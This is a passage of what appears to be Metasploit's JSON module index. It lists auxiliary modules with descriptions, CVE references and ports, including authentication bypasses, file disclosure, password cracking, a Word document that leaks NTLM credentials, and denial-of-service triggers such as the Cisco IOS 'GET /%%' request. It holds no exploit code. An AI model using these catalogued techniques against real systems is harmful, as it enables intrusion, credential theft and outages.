"description": "This module will log into the Web API of VMWare and try to power off\n a specified Virtual Machine.",
"references": [
],
"platform": "",
"arch": "",
"rport": 443,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/admin/vmware/poweroff_vm.rb",
"is_install_path": true,
"ref_name": "admin/vmware/poweroff_vm",
"check": false,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"auxiliary_admin/vmware/poweron_vm": {
"name": "VMWare Power On Virtual Machine",
"full_name": "auxiliary/admin/vmware/poweron_vm",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"theLightCosine <theLightCosine@metasploit.com>"
],
"description": "This module will log into the Web API of VMWare and try to power on\n a specified Virtual Machine.",
"references": [
],
"platform": "",
"arch": "",
"rport": 443,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/admin/vmware/poweron_vm.rb",
"is_install_path": true,
"ref_name": "admin/vmware/poweron_vm",
"check": false,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"auxiliary_admin/vmware/tag_vm": {
"name": "VMWare Tag Virtual Machine",
"full_name": "auxiliary/admin/vmware/tag_vm",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"theLightCosine <theLightCosine@metasploit.com>"
],
"description": "This module will log into the Web API of VMWare and\n 'tag' a specified Virtual Machine. It does this by\n logging a user event with user-supplied text.",
"references": [
],
"platform": "",
"arch": "",
"rport": 443,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/admin/vmware/tag_vm.rb",
"is_install_path": true,
"ref_name": "admin/vmware/tag_vm",
"check": false,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"auxiliary_admin/vmware/terminate_esx_sessions": {
"name": "VMWare Terminate ESX Login Sessions",
"full_name": "auxiliary/admin/vmware/terminate_esx_sessions",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"theLightCosine <theLightCosine@metasploit.com>"
],
"description": "This module will log into the Web API of VMWare and try to terminate\n user login sessions as specified by the session keys.",
"references": [
],
"platform": "",
"arch": "",
"rport": 443,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/admin/vmware/terminate_esx_sessions.rb",
"is_install_path": true,
"ref_name": "admin/vmware/terminate_esx_sessions",
"check": false,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"auxiliary_admin/vnc/realvnc_41_bypass": {
"name": "RealVNC NULL Authentication Mode Bypass",
"full_name": "auxiliary/admin/vnc/realvnc_41_bypass",
"rank": 300,
"disclosure_date": "2006-05-15",
"type": "auxiliary",
"author": [
"hdm <x@hdm.io>",
"theLightCosine <theLightCosine@metasploit.com>"
],
"description": "This module exploits an authentication bypass vulnerability\n in RealVNC Server versions 4.1.0 and 4.1.1. It sets up a proxy\n listener on LPORT and proxies to the target server.\n\n The AUTOVNC option requires that vncviewer be installed on\n the attacking machine.",
"references": [
"BID-17978",
"OSVDB-25479",
"URL-http://secunia.com/advisories/20107/",
"CVE-2006-2369"
],
"platform": "",
"arch": "",
"rport": 5900,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/admin/vnc/realvnc_41_bypass.rb",
"is_install_path": true,
"ref_name": "admin/vnc/realvnc_41_bypass",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_admin/vxworks/apple_airport_extreme_password": {
"name": "Apple Airport Extreme Password Extraction (WDBRPC)",
"full_name": "auxiliary/admin/vxworks/apple_airport_extreme_password",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"hdm <x@hdm.io>"
],
"description": "This module can be used to read the stored password of a vulnerable\n Apple Airport Extreme access point. Only a small number of firmware versions\n have the WDBRPC service running, however the factory configuration was\n vulnerable. It appears that firmware versions 5.0.x as well as 5.1.x are\n susceptible to this issue. Once the password is obtained, the access point\n can be managed using the Apple AirPort utility.",
"references": [
"OSVDB-66842",
"URL-http://blog.metasploit.com/2010/08/vxworks-vulnerabilities.html",
"US-CERT-VU-362332"
],
"platform": "",
"arch": "",
"rport": 17185,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/admin/vxworks/apple_airport_extreme_password.rb",
"is_install_path": true,
"ref_name": "admin/vxworks/apple_airport_extreme_password",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_admin/vxworks/dlink_i2eye_autoanswer": {
"name": "D-Link i2eye Video Conference AutoAnswer (WDBRPC)",
"full_name": "auxiliary/admin/vxworks/dlink_i2eye_autoanswer",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"hdm <x@hdm.io>"
],
"description": "This module can be used to enable auto-answer mode for the D-Link\n i2eye video conferencing system. Once this setting has been flipped,\n the device will accept incoming video calls without acknowledgement.\n The NetMeeting software included in Windows XP can be used to connect\n to this device. The i2eye product is no longer supported by the vendor\n and all models have reached their end of life (EOL).",
"references": [
"OSVDB-66842",
"URL-http://blog.metasploit.com/2010/08/vxworks-vulnerabilities.html",
"US-CERT-VU-362332"
],
"platform": "",
"arch": "",
"rport": 17185,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/admin/vxworks/dlink_i2eye_autoanswer.rb",
"is_install_path": true,
"ref_name": "admin/vxworks/dlink_i2eye_autoanswer",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_admin/vxworks/wdbrpc_memory_dump": {
"name": "VxWorks WDB Agent Remote Memory Dump",
"full_name": "auxiliary/admin/vxworks/wdbrpc_memory_dump",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"hdm <x@hdm.io>"
],
"description": "This module provides the ability to dump the system memory of a VxWorks target through WDBRPC",
"references": [
"OSVDB-66842",
"URL-http://blog.metasploit.com/2010/08/vxworks-vulnerabilities.html",
"US-CERT-VU-362332"
],
"platform": "",
"arch": "",
"rport": 17185,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/admin/vxworks/wdbrpc_memory_dump.rb",
"is_install_path": true,
"ref_name": "admin/vxworks/wdbrpc_memory_dump",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_admin/vxworks/wdbrpc_reboot": {
"name": "VxWorks WDB Agent Remote Reboot",
"full_name": "auxiliary/admin/vxworks/wdbrpc_reboot",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"hdm <x@hdm.io>"
],
"description": "This module provides the ability to reboot a VxWorks target through WDBRPC",
"references": [
"OSVDB-66842",
"URL-http://blog.metasploit.com/2010/08/vxworks-vulnerabilities.html",
"US-CERT-VU-362332"
],
"platform": "",
"arch": "",
"rport": 17185,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/admin/vxworks/wdbrpc_reboot.rb",
"is_install_path": true,
"ref_name": "admin/vxworks/wdbrpc_reboot",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_admin/webmin/edit_html_fileaccess": {
"name": "Webmin edit_html.cgi file Parameter Traversal Arbitrary File Access",
"full_name": "auxiliary/admin/webmin/edit_html_fileaccess",
"rank": 300,
"disclosure_date": "2012-09-06",
"type": "auxiliary",
"author": [
"Unknown",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a directory traversal in Webmin 1.580. The vulnerability\n exists in the edit_html.cgi component and allows an authenticated user with access\n to the File Manager Module to access arbitrary files with root privileges. The\n module has been tested successfully with Webmin 1.580 over Ubuntu 10.04.",
"references": [
"OSVDB-85247",
"BID-55446",
"CVE-2012-2983",
"URL-http://www.americaninfosec.com/research/dossiers/AISG-12-002.pdf",
"URL-https://github.com/webmin/webmin/commit/4cd7bad70e23e4e19be8ccf7b9f245445b2b3b80"
],
"platform": "",
"arch": "",
"rport": 10000,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-08-24 21:38:44 +0000",
"path": "/modules/auxiliary/admin/webmin/edit_html_fileaccess.rb",
"is_install_path": true,
"ref_name": "admin/webmin/edit_html_fileaccess",
"check": false,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"auxiliary_admin/webmin/file_disclosure": {
"name": "Webmin File Disclosure",
"full_name": "auxiliary/admin/webmin/file_disclosure",
"rank": 300,
"disclosure_date": "2006-06-30",
"type": "auxiliary",
"author": [
"Matteo Cantoni <goony@nothink.org>"
],
"description": "A vulnerability has been reported in Webmin and Usermin, which can be\n exploited by malicious people to disclose potentially sensitive information.\n The vulnerability is caused by an unspecified error within the handling\n of a URL. This can be exploited to read the contents of any files on the\n server via a specially crafted URL, without requiring a valid login.\n The vulnerability has been reported in Webmin (versions prior to 1.290) and\n Usermin (versions prior to 1.220).",
"references": [
"OSVDB-26772",
"BID-18744",
"CVE-2006-3392",
"US-CERT-VU-999601",
"URL-http://secunia.com/advisories/20892/"
],
"platform": "",
"arch": "",
"rport": 10000,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/admin/webmin/file_disclosure.rb",
"is_install_path": true,
"ref_name": "admin/webmin/file_disclosure",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_admin/wemo/crockpot": {
"name": "Belkin Wemo-Enabled Crock-Pot Remote Control",
"full_name": "auxiliary/admin/wemo/crockpot",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"wvu <wvu@metasploit.com>"
],
"description": "This module acts as a simple remote control for Belkin Wemo-enabled\n Crock-Pots by implementing a subset of the functionality provided by the\n Wemo App.\n\n No vulnerabilities are exploited by this Metasploit module in any way.",
"references": [
"URL-https://www.crock-pot.com/wemo-landing-page.html",
"URL-https://www.belkin.com/us/support-article?articleNum=101177",
"URL-http://www.wemo.com/"
],
"platform": "",
"arch": "",
"rport": 49152,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2019-03-04 19:25:56 +0000",
"path": "/modules/auxiliary/admin/wemo/crockpot.rb",
"is_install_path": true,
"ref_name": "admin/wemo/crockpot",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
"Stability": [
"crash-safe"
],
"SideEffects": [
"physical-effects"
]
}
},
"auxiliary_admin/zend/java_bridge": {
"name": "Zend Server Java Bridge Design Flaw Remote Code Execution",
"full_name": "auxiliary/admin/zend/java_bridge",
"rank": 300,
"disclosure_date": "2011-03-28",
"type": "auxiliary",
"author": [
"ikki",
"MC <mc@metasploit.com>"
],
"description": "This module abuses a flaw in the Zend Java Bridge Component of\n the Zend Server Framework. By sending a specially crafted packet, an\n attacker may be able to execute arbitrary code.\n\n NOTE: This module has only been tested with the Win32 build of the software.",
"references": [
"OSVDB-71420",
"ZDI-11-113",
"EDB-17078"
],
"platform": "",
"arch": "",
"rport": 10001,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/admin/zend/java_bridge.rb",
"is_install_path": true,
"ref_name": "admin/zend/java_bridge",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_analyze/apply_pot": {
"name": "Apply Pot File To Hashes",
"full_name": "auxiliary/analyze/apply_pot",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"h00die"
],
"description": "This module uses a John the Ripper or Hashcat .pot file to crack any password\n hashes in the creds database instantly. JtR's --show functionality is used to\n help combine all the passwords into an easy-to-use format.",
"references": [
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2019-03-21 20:54:32 +0000",
"path": "/modules/auxiliary/analyze/apply_pot.rb",
"is_install_path": true,
"ref_name": "analyze/apply_pot",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_analyze/jtr_aix": {
"name": "John the Ripper AIX Password Cracker",
"full_name": "auxiliary/analyze/jtr_aix",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"theLightCosine <theLightCosine@metasploit.com>",
"hdm <x@hdm.io>"
],
"description": "This module uses John the Ripper to identify weak passwords that have been\n acquired from passwd files on AIX systems. These utilize DES hashing.",
"references": [
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2019-03-21 20:54:32 +0000",
"path": "/modules/auxiliary/analyze/jtr_aix.rb",
"is_install_path": true,
"ref_name": "analyze/jtr_aix",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_analyze/jtr_linux": {
"name": "John the Ripper Linux Password Cracker",
"full_name": "auxiliary/analyze/jtr_linux",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"theLightCosine <theLightCosine@metasploit.com>",
"hdm <x@hdm.io>"
],
"description": "This module uses John the Ripper to identify weak passwords that have been\n acquired from unshadowed passwd files from Unix systems. The module will only crack\n MD5, BSDi and DES implementations by default. Set Crypt to true to also try to crack\n Blowfish and SHA(256/512). Warning: This is much slower.",
"references": [
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2019-03-21 20:54:32 +0000",
"path": "/modules/auxiliary/analyze/jtr_linux.rb",
"is_install_path": true,
"ref_name": "analyze/jtr_linux",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_analyze/jtr_mssql_fast": {
"name": "John the Ripper MS SQL Password Cracker (Fast Mode)",
"full_name": "auxiliary/analyze/jtr_mssql_fast",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"theLightCosine <theLightCosine@metasploit.com>",
"hdm <x@hdm.io>"
],
"description": "This module uses John the Ripper to identify weak passwords that have been\n acquired from the mssql_hashdump module. Passwords that have been successfully\n cracked are then saved as proper credentials.",
"references": [
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2019-03-21 20:54:32 +0000",
"path": "/modules/auxiliary/analyze/jtr_mssql_fast.rb",
"is_install_path": true,
"ref_name": "analyze/jtr_mssql_fast",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_analyze/jtr_mysql_fast": {
"name": "John the Ripper MySQL Password Cracker (Fast Mode)",
"full_name": "auxiliary/analyze/jtr_mysql_fast",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"theLightCosine <theLightCosine@metasploit.com>",
"hdm <x@hdm.io>"
],
"description": "This module uses John the Ripper to identify weak passwords that have been\n acquired from the mysql_hashdump module. Passwords that have been successfully\n cracked are then saved as proper credentials.",
"references": [
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2019-03-21 20:54:32 +0000",
"path": "/modules/auxiliary/analyze/jtr_mysql_fast.rb",
"is_install_path": true,
"ref_name": "analyze/jtr_mysql_fast",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_analyze/jtr_oracle_fast": {
"name": "John the Ripper Oracle Password Cracker (Fast Mode)",
"full_name": "auxiliary/analyze/jtr_oracle_fast",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"theLightCosine <theLightCosine@metasploit.com>",
"hdm <x@hdm.io>"
],
"description": "This module uses John the Ripper to identify weak passwords that have been\n acquired from the oracle_hashdump module. Passwords that have been successfully\n cracked are then saved as proper credentials.",
"references": [
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2019-03-21 20:54:32 +0000",
"path": "/modules/auxiliary/analyze/jtr_oracle_fast.rb",
"is_install_path": true,
"ref_name": "analyze/jtr_oracle_fast",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_analyze/jtr_postgres_fast": {
"name": "John the Ripper Postgres SQL Password Cracker",
"full_name": "auxiliary/analyze/jtr_postgres_fast",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"theLightCosine <theLightCosine@metasploit.com>"
],
"description": "This module uses John the Ripper to attempt to crack Postgres password\n hashes, gathered by the postgres_hashdump module. It is slower than some of the other\n JtR modules because it has to do some wordlist manipulation to properly handle postgres'\n format.",
"references": [
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2019-03-21 20:54:32 +0000",
"path": "/modules/auxiliary/analyze/jtr_postgres_fast.rb",
"is_install_path": true,
"ref_name": "analyze/jtr_postgres_fast",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_analyze/jtr_windows_fast": {
"name": "John the Ripper Windows Password Cracker (Fast Mode)",
"full_name": "auxiliary/analyze/jtr_windows_fast",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"hdm <x@hdm.io>"
],
"description": "This module uses John the Ripper to identify weak passwords that have been\n acquired as hashed files (loot) or raw LANMAN/NTLM hashes (hashdump). The goal\n of this module is to find trivial passwords in a short amount of time. To\n crack complex passwords or use large wordlists, John the Ripper should be\n used outside of Metasploit. This initial version just handles LM/NTLM credentials\n from hashdump and uses the standard wordlist and rules.",
"references": [
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2019-03-21 20:54:32 +0000",
"path": "/modules/auxiliary/analyze/jtr_windows_fast.rb",
"is_install_path": true,
"ref_name": "analyze/jtr_windows_fast",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_bnat/bnat_router": {
"name": "BNAT Router",
"full_name": "auxiliary/bnat/bnat_router",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"bannedit <bannedit@metasploit.com>",
"Jonathan Claudius"
],
"description": "This module will properly route BNAT traffic and allow for connections to be\n established to machines on ports which might not otherwise be accessible.",
"references": [
"URL-https://github.com/claudijd/bnat",
"URL-http://www.slideshare.net/claudijd/dc-skytalk-bnat-hijacking-repairing-broken-communication-channels"
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/bnat/bnat_router.rb",
"is_install_path": true,
"ref_name": "bnat/bnat_router",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_bnat/bnat_scan": {
"name": "BNAT Scanner",
"full_name": "auxiliary/bnat/bnat_scan",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"bannedit <bannedit@metasploit.com>",
"Jonathan Claudius <jclaudius@trustwave.com>"
],
"description": "This module is a scanner which can detect Broken NAT (network address translation)\n implementations, which could result in an inability to reach ports on remote\n machines. Typically, these ports will appear in nmap scans as 'filtered'/'closed'.",
"references": [
"URL-https://github.com/claudijd/bnat",
"URL-http://www.slideshare.net/claudijd/dc-skytalk-bnat-hijacking-repairing-broken-communication-channels"
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2019-03-05 03:38:51 +0000",
"path": "/modules/auxiliary/bnat/bnat_scan.rb",
"is_install_path": true,
"ref_name": "bnat/bnat_scan",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_client/hwbridge/connect": {
"name": "Hardware Bridge Session Connector",
"full_name": "auxiliary/client/hwbridge/connect",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Craig Smith"
],
"description": "The Hardware Bridge (HWBridge) is a standardized method for\n Metasploit to interact with Hardware Devices. This extends\n the normal exploit capabilities to the non-ethernet realm and\n enables direct hardware and alternative bus manipulations. You\n must have compatible bridging hardware attached to this machine or\n reachable on your network to use any HWBridge exploits.\n\n Use this exploit module to connect to the physical HWBridge, which\n will start an interactive hwbridge session. You can launch a hwbridge\n server locally by using compliant hardware and executing the local_hwbridge\n module. After that module has started, pass the HWBRIDGE_BASE_URL\n option to this connector module.",
"references": [
"URL-http://opengarages.org/hwbridge"
],
"platform": "",
"arch": "",
"rport": 8080,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-09-11 18:30:34 +0000",
"path": "/modules/auxiliary/client/hwbridge/connect.rb",
"is_install_path": true,
"ref_name": "client/hwbridge/connect",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_client/iec104/iec104": {
"name": "IEC104 Client Utility",
"full_name": "auxiliary/client/iec104/iec104",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Michael John <mjohn.info@gmail.com>"
],
"description": "This module allows sending IEC 104 commands.",
"references": [
],
"platform": "",
"arch": "",
"rport": 2404,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2018-08-03 20:13:48 +0000",
"path": "/modules/auxiliary/client/iec104/iec104.rb",
"is_install_path": true,
"ref_name": "client/iec104/iec104",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_client/mms/send_mms": {
"name": "MMS Client",
"full_name": "auxiliary/client/mms/send_mms",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module sends an MMS message to multiple phones of the same carrier.\n You can use it to send a malicious attachment to phones.",
"references": [
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/client/mms/send_mms.rb",
"is_install_path": true,
"ref_name": "client/mms/send_mms",
"check": false,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"auxiliary_client/sms/send_text": {
"name": "SMS Client",
"full_name": "auxiliary/client/sms/send_text",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module sends a text message to multiple phones of the same carrier.\n You can use it to send a malicious link to phones.\n\n Please note that this module cannot be used to send a media file (attachment).\n In order to send a media file, please use auxiliary/client/mms/send_mms instead.",
"references": [
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/client/sms/send_text.rb",
"is_install_path": true,
"ref_name": "client/sms/send_text",
"check": false,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"auxiliary_client/smtp/emailer": {
"name": "Generic Emailer (SMTP)",
"full_name": "auxiliary/client/smtp/emailer",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"et <et@metasploit.com>"
],
"description": "This module can be used to automate email delivery.\n This code is based on Joshua Abraham's email script for social\n engineering.",
"references": [
"URL-http://spl0it.org/"
],
"platform": "",
"arch": "",
"rport": "25",
"autofilter_ports": [
25,
465,
587,
2525,
25025,
25000
],
"autofilter_services": [
"smtp",
"smtps"
],
"targets": null,
"mod_time": "2019-01-24 13:49:22 +0000",
"path": "/modules/auxiliary/client/smtp/emailer.rb",
"is_install_path": true,
"ref_name": "client/smtp/emailer",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_crawler/msfcrawler": {
"name": "Metasploit Web Crawler",
"full_name": "auxiliary/crawler/msfcrawler",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"et <et@metasploit.com>"
],
"description": "This auxiliary module is a modular web crawler, to be used in conjunction with wmap (someday) or standalone.",
"references": [
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-08-24 21:38:44 +0000",
"path": "/modules/auxiliary/crawler/msfcrawler.rb",
"is_install_path": true,
"ref_name": "crawler/msfcrawler",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_docx/word_unc_injector": {
"name": "Microsoft Word UNC Path Injector",
"full_name": "auxiliary/docx/word_unc_injector",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"SphaZ <cyberphaz@gmail.com>"
],
"description": "This module modifies a .docx file that will, upon opening, submit stored\n netNTLM credentials to a remote host. It can also create an empty docx file. If\n emailed, the receiver needs to put the document in editing mode before the remote\n server will be contacted. Preview and read-only mode do not work. Verified to work\n with Microsoft Word 2003, 2007, 2010, and 2013. In order to get the hashes the\n auxiliary/server/capture/smb module can be used.",
"references": [
"URL-http://jedicorp.com/?p=534"
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/docx/word_unc_injector.rb",
"is_install_path": true,
"ref_name": "docx/word_unc_injector",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_dos/android/android_stock_browser_iframe": {
"name": "Android Stock Browser Iframe DOS",
"full_name": "auxiliary/dos/android/android_stock_browser_iframe",
"rank": 300,
"disclosure_date": "2012-12-01",
"type": "auxiliary",
"author": [
"Jean Pascal Pereira",
"Jonathan Waggoner"
],
"description": "This module exploits a vulnerability in the native browser that comes with Android 4.0.3.\n If successful, the browser will crash after viewing the webpage.",
"references": [
"PACKETSTORM-118539",
"CVE-2012-6301"
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/dos/android/android_stock_browser_iframe.rb",
"is_install_path": true,
"ref_name": "dos/android/android_stock_browser_iframe",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_dos/apple_ios/webkit_backdrop_filter_blur": {
"name": "iOS Safari Denial of Service with CSS",
"full_name": "auxiliary/dos/apple_ios/webkit_backdrop_filter_blur",
"rank": 300,
"disclosure_date": "2018-09-15",
"type": "auxiliary",
"author": [
"Sabri Haddouche"
],
"description": "This module exploits a vulnerability in WebKit on Apple iOS.\n If successful, the device will restart after viewing the webpage.",
"references": [
"URL-https://twitter.com/pwnsdx/status/1040944750973595649",
"URL-https://gist.github.com/pwnsdx/ce64de2760996a6c432f06d612e33aea",
"URL-https://nbulischeck.github.io/apple-safari-crash"
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2018-09-24 17:10:13 +0000",
"path": "/modules/auxiliary/dos/apple_ios/webkit_backdrop_filter_blur.rb",
"is_install_path": true,
"ref_name": "dos/apple_ios/webkit_backdrop_filter_blur",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_dos/cisco/ios_http_percentpercent": {
"name": "Cisco IOS HTTP GET /%% Request Denial of Service",
"full_name": "auxiliary/dos/cisco/ios_http_percentpercent",
"rank": 300,
"disclosure_date": "2000-04-26",
"type": "auxiliary",
"author": [
"aushack <patrick@osisecurity.com.au>"
],
"description": "This module triggers a Denial of Service condition in the Cisco IOS\n HTTP server. By sending a GET request for \"/%%\", the device becomes\n unresponsive. IOS 11.1 -> 12.1 are reportedly vulnerable. This module\n tested successfully against a Cisco 1600 Router IOS v11.2(18)P.",
"references": [
"BID-1154",
"CVE-2000-0380",
"OSVDB-1302"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-11-09 03:00:24 +0000",
"path": "/modules/auxiliary/dos/cisco/ios_http_percentpercent.rb",
"is_install_path": true,
"ref_name": "dos/cisco/ios_http_percentpercent",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_dos/cisco/ios_telnet_rocem": {
"name": "Cisco IOS Telnet Denial of Service",
"full_name": "auxiliary/dos/cisco/ios_telnet_rocem",
"rank": 300,
"disclosure_date": "2017-03-17",
"type": "auxiliary",
"author": [
"Artem Kondratenko"
],
"description": "This module triggers a Denial of Service condition in the Cisco IOS\n telnet service affecting multiple Cisco switches. Tested against Cisco\n Catalyst 2960 and 3750.",
"references": [
"BID-96960",
"CVE-2017-3881",
"URL-https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20170317-cmp",
"URL-https://artkond.com/2017/04/10/cisco-catalyst-remote-code-execution"
],
"platform": "",
"arch": "",
"rport": 23,
"autofilter_ports": [
],
"autofilter_services": [
],
